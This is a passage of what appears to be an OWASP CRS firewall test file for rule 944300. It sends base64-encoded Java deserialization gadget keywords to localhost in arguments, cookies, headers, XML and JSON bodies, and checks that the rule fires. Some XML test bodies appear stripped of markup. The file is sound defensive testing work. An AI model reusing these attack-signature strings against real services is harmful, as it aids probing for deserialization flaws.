"localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-103 + desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-104 + desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-105 + desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-106 + desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-107 + desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-108 + desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-109 + desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-110 + desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-111 + desc: "Argument test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-112 + desc: "Argument name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + 
output: + log_contains: "id \"944300\"" + - test_title: 944300-113 + desc: "Cookie test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-114 + desc: "Cookie name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-115 + desc: "Request header test includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-116 + desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-117 + desc: "XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-118 + desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-119 + desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + 
desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: 
"test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument test includes keyword 
Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + 
version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 